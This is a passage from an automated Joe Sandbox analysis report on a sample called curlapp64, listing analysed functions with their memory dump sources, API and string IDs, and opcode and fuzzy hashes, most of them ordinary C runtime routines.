                                                                                                                                                                                                  • Opcode Fuzzy Hash: 967a7eb5fad877dfc14cd9993c307950e699535fff711e18bd837ab3ad44be39
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4212742C0D2871EFE6A7F68645A0BD2F909F66742F5648B6D3FC825CBAD0C76148273
                                                                                                                                                                                                  Function 00007FF6CF9975BB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                                                  • API String ID: 909987262-3993994484
                                                                                                                                                                                                  • Opcode ID: 7d10e49bc5bcaf14ebf0dcbc836d0ecaa3bbe8ecc51578ee1f01ed474e94e3d0
                                                                                                                                                                                                  • Instruction ID: 92461fbfcb0695b6a19feff8bffe567ea112bda6f0d780e77c896d9ee4029868
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d10e49bc5bcaf14ebf0dcbc836d0ecaa3bbe8ecc51578ee1f01ed474e94e3d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6210942D0D2875EFE6A7F6824191BD2F508F62742FA64876D3FD826CB9C0D66048273
                                                                                                                                                                                                  Function 00007FF6CF9A4810 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2933794660-278324492
                                                                                                                                                                                                  • Opcode ID: 9754927367e6848381b861c8ed9dc860233e9b8de17360e42a4e2eb4be7fcd8b
                                                                                                                                                                                                  • Instruction ID: aabb4c1bc9812122a3f0eb27ace8c899caba5c47fd096ea472ee9d0f6590782b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9754927367e6848381b861c8ed9dc860233e9b8de17360e42a4e2eb4be7fcd8b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE114C26B14B4189EB00DF60E8442A833A4FB19759F450A31EAAE837A8DF78D1548350
                                                                                                                                                                                                  Function 00007FF6CF9B36A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: 103c69a73d494ed9b20f0460c6a2aadfaadf16eb5d6eb8d5db165faae30ffdac
                                                                                                                                                                                                  • Instruction ID: 1c55339c6615f2417968d07e2ae5f08c01e4b69318b3a6a889feacb933551218
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 103c69a73d494ed9b20f0460c6a2aadfaadf16eb5d6eb8d5db165faae30ffdac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF09021B0960281FF249F24A4867796760EF85762F940634C6EEC52FECF2DD049C720
                                                                                                                                                                                                  Function 00007FF8B9F61B30 Relevance: 7.8, APIs: 6, Instructions: 341COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8B9F63249,?,?,?,?,00007FF8B9F614B7), ref: 00007FF8B9F61C85
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8B9F63249,?,?,?,?,00007FF8B9F614B7), ref: 00007FF8B9F61CCC
                                                                                                                                                                                                  • memmove.VCRUNTIME140 ref: 00007FF8B9F61D6B
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8B9F63249,?,?,?,?,00007FF8B9F614B7), ref: 00007FF8B9F61D99
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8B9F63249,?,?,?,?,00007FF8B9F614B7), ref: 00007FF8B9F61DD5
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8B9F63249,?,?,?,?,00007FF8B9F614B7), ref: 00007FF8B9F61E9B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2162964266-0
                                                                                                                                                                                                  • Opcode ID: 71a6b9977b4b69140f2b3d41bb47331e6d654a8c7b90b0a4bbef06fe735d726f
                                                                                                                                                                                                  • Instruction ID: d10737df7b36e725ddcaf83d5c65a5e1f56159b2d05d4678dc3af017de977242
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a6b9977b4b69140f2b3d41bb47331e6d654a8c7b90b0a4bbef06fe735d726f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70E14733B146818AD754CE3DC0806AD37A2FB98FAAF15A135DB4D87758DB39E841CB90
                                                                                                                                                                                                  Function 00007FF8B9F6540F Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 2f9797f193df45c7b481db100e60b08213b7a9fd0dceec7202bd5f9a0139cfb3
                                                                                                                                                                                                  • Instruction ID: d740765c839b7abc6e36c10324eb4c1fafa06b9c78c581e3de98af479b2360db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f9797f193df45c7b481db100e60b08213b7a9fd0dceec7202bd5f9a0139cfb3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57311932A0C78287EB648F2CD55453837A2EB40BBAF601235CB69567D8DF3DE855DB40
                                                                                                                                                                                                  Function 00007FF8B9F653FA Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 9b6a69f8b95f0554885621ad68fe9f6678c237784e7bd2486879536f7a702587
                                                                                                                                                                                                  • Instruction ID: 6d754517124f347f421bde52f8b343b02dca8c2ba0cd47a2d3fde5449e3d114b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b6a69f8b95f0554885621ad68fe9f6678c237784e7bd2486879536f7a702587
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6315C32A0C78286EB648F2CD55453837A2EB00BBAF601235CB6D567D8CF3DE851C740
                                                                                                                                                                                                  Function 00007FF8B9F6541B Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 32d35d9c2b7723c51d5e857bb2684c78f39de99eb49c041b529360ad8ea2c01b
                                                                                                                                                                                                  • Instruction ID: cdbb159e5531ee9b1b7ed0a40351c49726d538818e1411fc32920f12e7f19f54
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d35d9c2b7723c51d5e857bb2684c78f39de99eb49c041b529360ad8ea2c01b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5313C32A0C78287EB648F2CD55453836A2EB40BBAF601235CB6D567D8DF3DE855D740
                                                                                                                                                                                                  Function 00007FF8B9F65424 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 97701945fa51463ff841a60e4708a2e229ebd4a6426745053824441736b893ec
                                                                                                                                                                                                  • Instruction ID: b471b9c4819c2da61ec69d632ded0c974ec07c893522a06a91f0ec6eec8e7544
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97701945fa51463ff841a60e4708a2e229ebd4a6426745053824441736b893ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5315A32A0C78286EB648F2CD55453837A2EB00BBAF602235CB6E567D8CF3DE851D740
                                                                                                                                                                                                  Function 00007FF8B9F6542D Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 720396027f9f8d3d3fe9203298fc25822f39fc1cda5f8523342ad4760ab4cd82
                                                                                                                                                                                                  • Instruction ID: 7a466c9c973a160438c525a1f815076a7b84f3b9a47f0a54598615721de2052b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 720396027f9f8d3d3fe9203298fc25822f39fc1cda5f8523342ad4760ab4cd82
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA314B32A0C78286EB648F2CD55453836A2EB00BBAF601235CB6D567D8CF3DE851D740
                                                                                                                                                                                                  Function 00007FF8B9F65436 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcstombs$_lseeki64freemalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2176892206-0
                                                                                                                                                                                                  • Opcode ID: 1912eb11bf130eae2e547b1970bca48ed8b19c29bdba1e8f34b65483a5501b4b
                                                                                                                                                                                                  • Instruction ID: d597e6ad532cf7ef3f65fb38ceb2667073f4eb454c344e08096f7c6802163f18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1912eb11bf130eae2e547b1970bca48ed8b19c29bdba1e8f34b65483a5501b4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7313A32A0C78286EB648F2CD55453837A2EB00BBAF602235CB6E567D8DF3DE855D740
                                                                                                                                                                                                  Function 00007FF6CF9BC23C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                  • Opcode ID: aff3ea997d203e62a904ae556a1831be3f51b6e78a87114d2869fecf62ca5d3e
                                                                                                                                                                                                  • Instruction ID: 62acc70d6b7c2c09fbf3d218c7534bf998d0aecd0d71ee771de38cc0ef7ea49c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aff3ea997d203e62a904ae556a1831be3f51b6e78a87114d2869fecf62ca5d3e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8881C272E0C20285FF754F29815027837A1AB51B8EF558835CACDD728FDF2DEA0297A1
                                                                                                                                                                                                  Function 00007FF6CF99CE70 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                  • API String ID: 3668304517-2658103896
                                                                                                                                                                                                  • Opcode ID: e705c6baa8a664ae6711b9ed81bc1c5cb4b02f73d7e74221b25eae945889d0f3
                                                                                                                                                                                                  • Instruction ID: 4f88209e3973843f0c5a663efbb06b83ff5e9f7667edfa0061af57f7e67cece2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e705c6baa8a664ae6711b9ed81bc1c5cb4b02f73d7e74221b25eae945889d0f3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C561BE62B09B4599FF00DFA9D4403AC23B1AB447A6F414631DE9D677AEDF38D646C310
                                                                                                                                                                                                  Function 00007FF6CF975E30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: http://$ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-3494531113
                                                                                                                                                                                                  • Opcode ID: fe9e7e2e38a054dfc441c57ac3f524ec66abeed958864421d2b95fa61fc15c85
                                                                                                                                                                                                  • Instruction ID: 7e8b2349d5497df2ff3aa0937cbd8cf2245fc396d9807f45c0c544826abeb9c8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe9e7e2e38a054dfc441c57ac3f524ec66abeed958864421d2b95fa61fc15c85
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6551D162B18B8545EE509F26D10427DA361EB86BE5F504232EAED87ADFDE3CF181C710
                                                                                                                                                                                                  Function 00007FF6CF9A5C40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                  • Opcode ID: 728415faf017250e712976e96d38f2401c81adbe10c3a61a1a0af65f815d6fac
                                                                                                                                                                                                  • Instruction ID: 6113d34fd937b2cd2abb2d5c3da655f41ad91030b52467897c5b7e3237f83646
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 728415faf017250e712976e96d38f2401c81adbe10c3a61a1a0af65f815d6fac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51AC32F196028AEF548F15E448A7837D2FB44B99F158131DA9A8778EDF3CE845C710
                                                                                                                                                                                                  Function 00007FF6CF9A7B74 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                  • Opcode ID: 60447258ac59ea0ff9118befcd0d727b4e7c69a38ad0fbccb189498ca1fc1e7c
                                                                                                                                                                                                  • Instruction ID: cabdc7e30dce0edb52dbc91cc16a6fd2cae5a74eac44da16aa7cb79f0418e23e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60447258ac59ea0ff9118befcd0d727b4e7c69a38ad0fbccb189498ca1fc1e7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC517B72E082828AEF648F21944527977E0FB54B96F144235DAED87B8ACF3CE454C722
                                                                                                                                                                                                  Function 00007FF6CF9A7384 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
